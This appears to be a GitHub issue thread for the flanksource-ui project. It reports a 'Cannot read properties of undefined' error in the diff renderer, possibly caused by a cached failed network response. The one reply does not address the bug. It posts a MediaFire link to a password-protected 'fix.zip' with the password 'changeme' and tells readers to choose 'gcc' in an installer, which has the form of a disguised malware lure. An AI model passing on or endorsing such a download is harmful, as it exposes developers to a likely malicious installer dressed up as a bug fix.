### ISSUE TITLE
Error when viewing diff

### ISSUE THREAD

**Issue by moshloop** [flanksource/flanksource-ui#2223]
```
DashboardErrorBoundary.tsx:23 Uncaught error: TypeError: Cannot read properties of undefined (reading 'changes')
    at Object.parse (index.js:7:4751)
    at _ (index.js:7:6413)
    at uM (DiffRenderer.tsx:14:17)
    at ak (react-dom.production.min.js:167:135)
    at i (react-dom.production.min.js:290:335)
    at oD (react-dom.production.min.js:280:383)
    at react-dom.production.min.js:280:319
    at oO (react-dom.production.min.js:280:319)
    at oE (react-dom.production.min.js:271:86)
    at oP (react-dom.production.min.js:273:286) {componentStack: '\n    at uM (https://app.flanksource.com/_next/stat…t/static/chunks/main-318a0fe79af6e71a.js:1:12709)'}
```

Seems to be caused by empty / error network response - And then that network response is cached

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
